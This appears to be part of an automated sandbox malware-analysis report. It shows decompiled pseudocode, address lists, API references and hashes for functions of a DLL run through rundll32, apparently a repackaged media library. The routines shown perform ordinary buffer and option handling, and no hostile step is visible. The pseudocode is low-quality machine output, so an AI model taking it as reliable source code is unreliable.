							if(_t165 ==  &(_t167[4])) {
								 *_t168 = 0;
								_t113 = L10028DA0();
								if(_t113 == 0) {
									goto L21;
								} else {
									goto L19;
								}
							} else {
								 *_t168 = _t165;
								_t113 = L10028DA0();
								if(_t113 == 0) {
									L21:
									_t118 = _t167[2];
									_t145 = _t167[1];
									goto L22;
								} else {
									if(_t165 == 0) {
										L19:
										_t153 = _t167[1];
										_t143 = _t113;
										_t166 =  *_t167;
										_t132 = _t153 + 1;
										_t168[7] = _t166;
										if(_t132 >= 8) {
											if((_t113 & 0x00000001) != 0) {
												_t144 =  *_t166 & 0x000000ff;
												_t132 = _t153;
												_t166 = _t166 + 1;
												 *_t113 = _t144;
												_t82 = _t113 + 1; // 0x1
												_t143 = _t82;
											}
											if((_t143 & 0x00000002) != 0) {
												_t154 =  *_t166 & 0x0000ffff;
												_t143 = _t143 + 2;
												_t166 = _t166 + 2;
												_t132 = _t132 - 2;
												 *(_t143 - 2) = _t154;
											}
											if((_t143 & 0x00000004) != 0) {
												_t158 =  *_t166;
												_t143 = _t143 + 4;
												_t166 = _t166 + 4;
												_t132 = _t132 - 4;
												 *(_t143 - 4) = _t158;
											}
										}
										_t114 = memcpy(_t143, _t166, _t132);
										_t168 =  &(_t168[3]);
									}
									 *_t167 = _t114;
									_t167[2] = _t118;
									continue;
								}
							}
						}
						goto L66;
						L15:
						_t168[1] = _t121;
						_t168[7] = _t121;
						_t168[3] = _t168[0x112];
						_t168[2] = _t168[0x111];
						_t91 =  *_t167;
						 *_t168 = _t91 + _t145;
						L100A07D0();
						if(_t91 != 0) {
							_t122 = _t167[1];
							_t92 =  <=  ? 0xfffffffa - _t122 : _t91;
							_t136 = _t167[2];
							_t86 = ( <=  ? 0xfffffffa - _t122 : _t91) + _t122;
							_t167[1] = _t86;
							if(_t136 != 0) {
								goto L39;
							}
							goto L40;
						} else {
							_t123 = _t168[7];
							_t159 = 0x7fffffff;
							_t145 = _t167[1];
							_t118 = _t167[2];
							if(_t123 <= 0x3fffffff) {
								_t159 = _t123 + _t123;
							}
							goto L11;
						}
						goto L66;
					}
				}
				L66:
			}

0x1000913a
0x10009141
0x1000914b
0x10009377
0x10009377
0x10009151
0x10009151
0x1000919d
0x1000919d
0x100091a6
0x100091a9
0x100091ab
0x00000000
0x00000000
0x100091b4
0x100091bc
0x100091bc
0x100091bf
0x100091bf
0x100091c4
0x10009287
0x1000928b
0x1000928e
0x10009296
0x100092d6
0x100092d9
0x100092db
0x100092e0
0x100093f6
0x100094c6
0x100094c9
0x100094cc
0x100094cc
0x10009402
0x100094b6
0x100094bb
0x100094be
0x100094be
0x1000940e
0x100094a5
0x100094ab
0x100094ae
0x100094ae
0x10009414
0x10009416
0x10009419
0x10009421
0x10009421
0x10009421
0x10009426
0x00000000
0x1000942c
0x00000000
0x1000942c
0x00000000
0x100092e6
0x100092e9
0x100092eb
0x100092eb
0x100092f1
0x100092f1
0x100092e9
0x100092f4
0x100092f7
0x100092f9
0x100092fe
0x100092fe
0x10009304
0x10009306
0x10009306
0x10009311
0x1000931b
0x1000931e
0x10009323
0x100093b3
0x100094ee
0x100094ef
0x100094f4
0x100094f5
0x100094f5
0x100093bc
0x100094d2
0x100094d5
0x100094d8
0x100094db
0x100094de
0x100094de
0x100093c5
0x100093cb
0x100093d1
0x100093d3
0x100093d6
0x100093d9
0x100093dc
0x100093df
0x100093e3
0x100093e7
0x100093e9
0x100093e9
0x100093c5
0x10009329
0x1000932d
0x10009332
0x10009337
0x10009337
0x1000933c
0x10009342
0x10009342
0x10009345
0x10009351
0x10009354
0x10009356
0x10009359
0x1000935e
0x10009360
0x10009363
0x10009366
0x10009369
0x00000000
0x10009369
0x00000000
0x10009298
0x1000929f
0x100092a3
0x100092a6
0x100092b1
0x100092b5
0x100092ba
0x100092be
0x100092c5
0x10009460
0x10009469
0x1000946d
0x1000947f
0x100092cb
0x100092cd
0x100092d3
0x00000000
0x100092d3
0x00000000
0x100092cd
0x100092c5
0x100091d2
0x100091db
0x100091e2
0x100091e8
0x10009160
0x100091ee
0x100091ee
0x100091ee
0x10009164
0x10009168
0x1000916b
0x1000916b
0x1000916d
0x10009173
0x10009179
0x10009250
0x10009257
0x1000925e
0x00000000
0x00000000
0x00000000
0x00000000
0x1000917f
0x1000917f
0x10009182
0x10009189
0x10009281
0x10009281
0x10009284
0x00000000
0x1000918f
0x10009191
0x10009260
0x10009260
0x10009263
0x10009265
0x10009268
0x1000926b
0x10009272
0x10009382
0x10009495
0x10009498
0x1000949a
0x1000949b
0x1000949d
0x1000949d
0x1000949d
0x1000938b
0x10009480
0x10009483
0x10009486
0x10009489
0x1000948c
0x1000948c
0x10009394
0x1000939a
0x1000939c
0x1000939f
0x100093a2
0x100093a5
0x100093a5
0x10009394
0x1000927a
0x1000927a
0x1000927a
0x10009197
0x1000919a
0x00000000
0x1000919a
0x10009189
0x10009179
0x00000000
0x100091f8
0x100091f8
0x10009203
0x10009207
0x10009212
0x10009216
0x1000921b
0x1000921e
0x10009225
0x10009438
0x10009444
0x10009447
0x1000944a
0x1000944c
0x10009451
0x00000000
0x10009457
0x00000000
0x1000922b
0x1000922b
0x1000922f
0x10009234
0x10009237
0x10009240
0x10009246
0x10009246
0x00000000
0x10009240
0x00000000
0x10009225
0x1000919d
0x00000000

APIs

mv_realloc.F086 ref: 10009182
strlen.MSVCRT ref: 100091B7
strftime.MSVCRT ref: 1000921E

Strings

!!!!, xrefs: 1000941C
[truncated strftime output], xrefs: 10009311

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_reallocstrftimestrlen
String ID: !!!!$[truncated strftime output]
API String ID: 709960874-1743851734
Opcode ID: d5bbf64755c465b92655ce73a4e1a41950866e2796eda1fbafdbb6a7e4c7dd5d
Instruction ID: 6237faa146818e252d6bc5810784fdb2c70fb651bac13d65fe422c41695cf2e5
Opcode Fuzzy Hash: d5bbf64755c465b92655ce73a4e1a41950866e2796eda1fbafdbb6a7e4c7dd5d
Instruction Fuzzy Hash: 40A19071A042429FE715CF28C98539E77E2EF843D0F268528ED898B399E735DE45CB42

Uniqueness

Uniqueness Score: -1.00%

Function 1002F256 Relevance: 14.1, APIs: 2, Strings: 6, Instructions: 128stringCOMMON

Download Yara Rule

APIs

mv_expr_parse_and_eval.F086 ref: 1002F115
strcmp.MSVCRT ref: 1002F1EE
mv_log.F086 ref: 1002F4BD

Strings

default, xrefs: 1002EFF2
all, xrefs: 1002F08F
9, xrefs: 1002F260
min, xrefs: 1002F03F
max, xrefs: 1002F025
none, xrefs: 1002F06A

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_expr_parse_and_evalmv_logstrcmp
String ID: 9$all$default$max$min$none
API String ID: 638344568-340763830
Opcode ID: 3a43cda7731b7cc6d1eec2ee77c04c39d1a710ebf161850413e893610c0bccc0
Instruction ID: 7e14d16d44837c53f6e0618a54e32c20455491f957ac13e1facf48bed44ae4fc
Opcode Fuzzy Hash: 3a43cda7731b7cc6d1eec2ee77c04c39d1a710ebf161850413e893610c0bccc0
Instruction Fuzzy Hash: 1F5128759097468BC395DF28E04029BFBE5FFC9354F518A2EE9C9C7200EB70E8448B42

Uniqueness

Uniqueness Score: -1.00%

Function 1000C2D0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

mv_bprint_init_for_buffer.F086 ref: 1000C308
mv_bprintf.F086 ref: 1000C330

Strings

AMBI%d, xrefs: 1000C394
NONE, xrefs: 1000C327
USR%d, xrefs: 1000C37C

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init_for_buffermv_bprintf
String ID: AMBI%d$NONE$USR%d
API String ID: 2490314137-3656852315
Opcode ID: 43d24e6ab82ebdc785fe14ad5c403714f51aa5fcf9dbfb0c2afa0a7af5774545
Instruction ID: 0a946672120a056d3661d42bdbf04e5838db89b9617306f254fc419f9ddf239a
Opcode Fuzzy Hash: 43d24e6ab82ebdc785fe14ad5c403714f51aa5fcf9dbfb0c2afa0a7af5774545
Instruction Fuzzy Hash: 41117FB4919745CBE314EF28C480A5EB7E0FF84380F51C92EF68897254C334AA419B93

Uniqueness

Uniqueness Score: -1.00%

Function 1000C470 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 56COMMON

Download Yara Rule

APIs

mv_bprint_init_for_buffer.F086 ref: 1000C4A8
mv_bprintf.F086 ref: 1000C4D0

Strings

ambisonic ACN %d, xrefs: 1000C534
none, xrefs: 1000C4C7
user %d, xrefs: 1000C51C

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_bprint_init_for_buffermv_bprintf
String ID: ambisonic ACN %d$none$user %d
API String ID: 2490314137-4180635230
Opcode ID: b66278b44bd33978a7099e039c8c5aff353fdb60d4a10324e67c31c1774a271f
Instruction ID: b6a1bd800e9813b9dae9be9b31ba14f11150b02b1f0a339f321a001e9bfab4f6
Opcode Fuzzy Hash: b66278b44bd33978a7099e039c8c5aff353fdb60d4a10324e67c31c1774a271f
Instruction Fuzzy Hash: B71172B4909B558BE320DF24C48096EB7E0FF847C4F51881EF5D887289D334A981DB93

Uniqueness

Uniqueness Score: -1.00%

Function 10030180 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 84
COMMON

Download Yara Rule

C-Code - Quality: 16%

			E10030180(char* _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v32;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v76;
				intOrPtr _v80;
				char* _v84;
				intOrPtr _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t33;
				intOrPtr _t37;
				char* _t41;
				intOrPtr* _t45;
				intOrPtr _t52;
				char* _t53;
				intOrPtr* _t54;
				void* _t55;
				intOrPtr* _t56;
				void* _t64;

				_t56 = _t55 - 0x4c;
				_t45 = _a8;
				_v32 = 0;
				_t53 = _a4;
				_t52 = _a12;
				if(_t45 == 0) {
					L10:
					return 0;
				} else {
					_t54 = 0;
					while(1) {
						_v84 = _t54;
						_v80 = 2;
						_v88 = 0x100b75dd;
						 *_t56 =  *_t45;
						_t33 = E100110D0();
						_t54 = _t33;
						if(_t33 == 0) {
							break;
						}
						_v80 = _t52;
						_v84 = _a4;
						 *_t56 = _t53;
						_v88 =  *_t54;
						_t37 = L1002F6A0(_t45, _t52, _t53, _t54, _t64);
						if(_t37 == 0xabafb008) {
							_v80 = 0;
							_v84 = _a4;
							_v88 =  *_t54;
							_t41 =  &_v32;
							 *_t56 = _t41;
							_v52 = _t41;
							_t37 = E10011210(_t45, _t52, _t53, _t54);
							if(_t37 >= 0) {
								continue;
							} else {
								goto L6;
							}
						} else {
							if(_t37 >= 0) {
								continue;
							} else {
								_v52 =  &_v32;
								L6:
								_v48 = _t37;
								_v76 = _a4;
								_v84 = "Error setting option %s to value %s.\n";
								_v88 = 0x10;
								 *_t56 = _t53;
								_v80 =  *_t54;
								E10026560();
								 *_t56 = _v52;
								L10011CC0();
								return _v48;
							}
						}
						goto L11;
					}
					 *_t56 = _t45;
					L10011CC0();
					 *_t45 = _v32;
					goto L10;
				}
				L11:
			}

0x10030186
0x10030189
0x1003018d
0x10030191
0x10030195
0x1003019b
0x1003028e
0x10030297
0x100301a1
0x100301a1
0x100301b0
0x100301b0
0x100301be
0x100301c2
0x100301c8
0x100301cb
0x100301d2
0x100301d4
0x00000000
0x00000000
0x100301da
0x100301e1
0x100301e8
0x100301eb
0x100301ef
0x100301f9
0x10030252
0x10030259
0x10030260
0x10030264
0x10030268
0x1003026b
0x1003026f
0x10030276
0x00000000
0x1003027c
0x00000000
0x1003027c
0x100301fb
0x100301fd
0x00000000
0x100301ff
0x10030203
0x10030207
0x10030207
0x10030213
0x1003021f
0x10030223
0x10030227
0x1003022a
0x1003022e
0x10030237
0x1003023a
0x1003024a
0x1003024a
0x100301fd
0x00000000
0x100301f9
0x10030280
0x10030283
0x1003028c
0x00000000
0x1003028c
0x00000000

APIs

mv_dict_get.F086 ref: 100301CB
mv_opt_set.F086 ref: 100301EF
mv_log.F086 ref: 1003022E
mv_dict_free.F086 ref: 1003023A
mv_dict_set.F086 ref: 1003026F
mv_dict_free.F086 ref: 10030283

Strings

Error setting option %s to value %s., xrefs: 10030217

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_dict_free$mv_dict_getmv_dict_setmv_logmv_opt_set
String ID: Error setting option %s to value %s.
API String ID: 3258142065-3279051434
Opcode ID: 1a9d09993977aecac0336f7559c27a5d9f97f57d75cbac26b23ac616c45300c0
Instruction ID: dd90fc101553d41281afc15f61c3f85b5a8b12bd015060489efb1d4e53b39e8a
Opcode Fuzzy Hash: 1a9d09993977aecac0336f7559c27a5d9f97f57d75cbac26b23ac616c45300c0
Instruction Fuzzy Hash: 623192B9A097049FC740DF69D48065BBBE4FF88394F41882EF99CCB310E674E9409B82

Uniqueness

Uniqueness Score: -1.00%

Function 10002670 Relevance: 12.1, APIs: 8, Instructions: 99
COMMON

Download Yara Rule

C-Code - Quality: 32%

			E10002670(void* __ecx, void* __edx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t44;
				signed int _t50;
				signed int _t52;
				signed int _t53;
				intOrPtr* _t54;
				signed int _t55;
				signed int _t65;
				void* _t66;
				signed int _t68;
				signed int _t69;
				signed int _t70;
				void* _t71;
				signed int* _t72;

				_t72 = _t71 - 0x3c;
				_t72[4] = 1;
				_t69 = _t72[0x14];
				_t52 = _t72[0x15];
				_t72[2] = _t72[0x16];
				_t72[3] = _t69;
				_t72[1] = _t52;
				 *_t72 =  &(_t72[0xb]);
				if(L1003CB90(_t52, __edx, 1, _t66) < 0) {
					L14:
					return 0;
				} else {
					 *_t72 = 0x1c;
					_t39 = E10029100();
					_t65 = _t39;
					if(_t39 == 0) {
						goto L14;
					} else {
						 *(_t39 + 0x10) = _t52;
						 *(_t39 + 0x14) = _t69;
						asm("cdq");
						 *(_t65 + 0x18) = _t72[0xb] / _t72[0x16];
						 *_t72 = _t69;
						L1003CB70();
						_t53 =  ==  ? 1 : _t52;
						 *(_t65 + 4) = _t53;
						_t72[1] = 4;
						 *_t72 = _t53;
						_t44 = E100291F0();
						 *_t65 = _t44;
						if(_t44 == 0) {
							L13:
							 *_t72 = _t65;
							L100290D0();
							goto L14;
						} else {
							_t70 = 0;
							if( *(_t65 + 4) > 0) {
								while(1) {
									_t68 = _t70 * 4;
									_t72[2] = 0;
									_t54 = _t44 + _t68;
									_t72[1] = 1;
									 *_t72 = _t72[0xb];
									 *_t54 = L10017E40(_t54, _t65, _t68);
									_t44 =  *_t65;
									if( *((intOrPtr*)(_t44 + _t68)) == 0) {
										break;
									}
									_t70 = _t70 + 1;
									if( *(_t65 + 4) <= _t70) {
										goto L15;
									} else {
										continue;
									}
									goto L16;
								}
								if(_t44 != 0) {
									if( *(_t65 + 4) > 0) {
										_t55 = 0;
										while(1) {
											_t50 = _t44 + _t55 * 4;
											_t55 = _t55 + 1;
											 *_t72 = _t50;
											L10018950(_t55);
											if(_t55 >=  *(_t65 + 4)) {
												goto L12;
											}
											_t44 =  *_t65;
										}
									}
									L12:
									 *_t72 = _t65;
									E100290E0();
								}
								goto L13;
							} else {
								L15:
								 *(_t65 + 0xc) = _t72[0x16];
								return _t65;
							}
						}
					}
				}
				L16:
			}

0x10002679
0x10002680
0x10002684
0x10002688
0x1000268c
0x10002694
0x10002698
0x1000269c
0x100026a6
0x1000277b
0x10002786
0x100026ac
0x100026ac
0x100026b3
0x100026ba
0x100026bc
0x00000000
0x100026c2
0x100026c2
0x100026ca
0x100026d1
0x100026d6
0x100026d9
0x100026dc
0x100026e8
0x100026eb
0x100026ee
0x100026f2
0x100026f5
0x100026fa
0x100026fe
0x10002773
0x10002773
0x10002776
0x00000000
0x10002700
0x10002703
0x10002707
0x10002716
0x10002716
0x1000271f
0x10002723
0x1000272b
0x10002733
0x1000273b
0x1000273d
0x10002744
0x00000000
0x00000000
0x10002710
0x10002714
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x10002714
0x10002748
0x1000274f
0x10002751
0x1000275a
0x1000275a
0x1000275d
0x1000275e
0x10002761
0x10002769
0x00000000
0x00000000
0x10002758
0x10002758
0x1000275a
0x1000276b
0x1000276b
0x1000276e
0x1000276e
0x00000000
0x10002709
0x10002790
0x10002794
0x100027a0
0x100027a0
0x10002707
0x100026fe
0x100026bc
0x00000000

APIs

mv_samples_get_buffer_size.F086 ref: 1000269F
mv_mallocz.F086 ref: 100026B3
mv_sample_fmt_is_planar.F086(?), ref: 100026DC
mv_calloc.F086(?), ref: 100026F5
mv_fifo_alloc2.F086(?), ref: 10002736
mv_fifo_freep2.F086(?), ref: 10002761
mv_freep.F086(?), ref: 1000276E

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_callocmv_fifo_alloc2mv_fifo_freep2mv_freepmv_malloczmv_sample_fmt_is_planarmv_samples_get_buffer_size
String ID:
API String ID: 3721653357-0
Opcode ID: 6a25a427b3a7cd424786be72b2dc5f3278f13d1d67c199b93a466af71cd06fba
Instruction ID: e2c14ad1b6a78883c2eba2dd48e6cbb770f894d0147dffab9e861290766f1c48
Opcode Fuzzy Hash: 6a25a427b3a7cd424786be72b2dc5f3278f13d1d67c199b93a466af71cd06fba
Instruction Fuzzy Hash: 34311AB86087068FD700DF6AD58061AFBE4FF88394F51892EE99CC7211E774E855CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1001D220 Relevance: 12.1, APIs: 8, Instructions: 71COMMON

Download Yara Rule

APIs

mv_mallocz.F086 ref: 1001D230
mv_sha512_alloc.F086 ref: 1001D273
mv_sha512_alloc.F086 ref: 1001D2BB
mv_md5_alloc.F086 ref: 1001D2EB
mv_sha_alloc.F086 ref: 1001D31B
mv_sha_alloc.F086 ref: 1001D34B
mv_sha_alloc.F086 ref: 1001D37B

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.488304107.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488403231.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488409319.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488434034.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488441517.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488447333.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.488476954.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_sha_alloc$mv_sha512_alloc$mv_malloczmv_md5_alloc
String ID:
API String ID: 1780169607-0
Opcode ID: 50135c56b61823b36176c8843c5ea436513e172120641a91292998debd03ff9b
Instruction ID: c35801f6e3b9458600ddf5c5e3e107538d07f14f20f18202b00d36dbdc320db3
Opcode Fuzzy Hash: 50135c56b61823b36176c8843c5ea436513e172120641a91292998debd03ff9b
Instruction Fuzzy Hash: C731E5B4116350CED740EF50D548A86BAE0FF00354FA7C5A9D61A4F222C7BED584DBE6

Uniqueness

Uniqueness Score: -1.00%

Function 1001E360 Relevance: 12.1, APIs: 8, Instructions: 64
COMMON

Download Yara Rule

C-Code - Quality: 46%

			E1001E360(intOrPtr __ebx, void* __ecx, intOrPtr __edi, intOrPtr __esi, intOrPtr __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr* _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t32;
				intOrPtr _t36;
				intOrPtr* _t38;
				void* _t40;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t52;
				intOrPtr* _t54;

				_t40 = __ecx;
				_v12 = __esi;
				_t49 = _a4;
				_v8 = __edi;
				_v16 = __ebx;
				_v4 = __ebp;
				_t46 =  *((intOrPtr*)(_t49 + 4));
				 *_t54 = 0x10;
				_t25 = E10029100();
				_t38 = _t25;
				if(_t25 == 0) {
					_t52 = 0xfffffff4;
					goto L8;
				} else {
					_t27 = L1001AC40(_t38, _t46, _t49);
					 *_t38 = _t27;
					if(_t27 == 0) {
						L6:
						_t52 = 0xfffffff4;
						goto L7;
					} else {
						 *_t54 = _t27;
						_v56 = _a12;
						_t31 = L1001BC40();
						_t52 = _t31;
						if(_t31 < 0) {
							L7:
							_t20 = _t38 + 4; // 0x4
							 *_t54 = _t20;
							E1000A000(_t38, _t49);
							 *_t54 = _t38;
							L1001ADB0(_t38);
							L8:
							 *_t54 = _t38;
							L100290D0();
						} else {
							 *_t54 = _t49;
							_t32 = L10009FC0(_t38, _t40);
							 *((intOrPtr*)(_t38 + 4)) = _t32;
							if(_t32 == 0) {
								goto L6;
							} else {
								 *((intOrPtr*)(_t38 + 8)) = _a16;
								 *((intOrPtr*)(_t38 + 0xc)) = _a20;
								_v52 = 0x1001d8d0;
								_v44 = 0;
								_v48 = _t46;
								_v56 = 0x10;
								 *_t54 = _t38;
								_t36 = L10009E60(_t38, _t46, _t49, _t52);
								 *((intOrPtr*)(_a8 + 0xb8)) = _t36;
								if(_t36 == 0) {
									goto L6;
								} else {
									_t52 = 0;
								}
							}
						}
					}
				}
				return _t52;
			}

0x1001e360
0x1001e363
0x1001e367
0x1001e36b
0x1001e36f
0x1001e373
0x1001e377
0x1001e37a
0x1001e381
0x1001e388
0x1001e38a
0x1001e43e
0x00000000
0x1001e390
0x1001e390
0x1001e395
0x1001e399
0x1001e408
0x1001e408
0x00000000
0x1001e39b
0x1001e39b
0x1001e3a2
0x1001e3a6
0x1001e3ad
0x1001e3af
0x1001e40d
0x1001e40d
0x1001e410
0x1001e413
0x1001e418
0x1001e41b
0x1001e420
0x1001e420
0x1001e423
0x1001e3b1
0x1001e3b1
0x1001e3b4
0x1001e3b9
0x1001e3be
0x00000000
0x1001e3c0
0x1001e3ce
0x1001e3d5
0x1001e3da
0x1001e3de
0x1001e3e2
0x1001e3e6
0x1001e3ea
0x1001e3ed
0x1001e3f6
0x1001e3fe
0x00000000
0x1001e400
0x1001e400
0x1001e400
0x1001e3fe
0x1001e3be
0x1001e3af
0x1001e399
0x1001e43d

APIs

mv_mallocz.F086 ref: 1001E381
mv_frame_alloc.F086 ref: 1001E390

Part of subcall function 1001AC40: mv_malloc.F086 ref: 1001AC56

mv_frame_ref.F086 ref: 1001E3A6

Part of subcall function 1001BC40: mv_channel_layout_check.F086 ref: 1001BC94
Part of subcall function 1001BC40: mv_channel_layout_check.F086 ref: 1001BCDF
Part of subcall function 1001BC40: mv_buffer_ref.F086 ref: 1001BD0E
Part of subcall function 1001BC40: mv_calloc.F086 ref: 1001BD48
Part of subcall function 1001BC40: mv_buffer_ref.F086 ref: 1001BD97

mv_buffer_ref.F086 ref: 1001E3B4

Part of subcall function 10009FC0: mv_mallocz.F086 ref: 10009FD2

mv_buffer_create.F086 ref: 1001E3ED

Part of subcall function 10009E60: mv_mallocz.F086 ref: 10009E86
Part of subcall function 10009E60: mv_mallocz.F086 ref: 10009EBF

mv_buffer_unref.F086 ref: 1001E413
mv_frame_free.F086 ref: 1001E41B

Memory Dump Source

Source File: 00000003.00000002.488308300.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

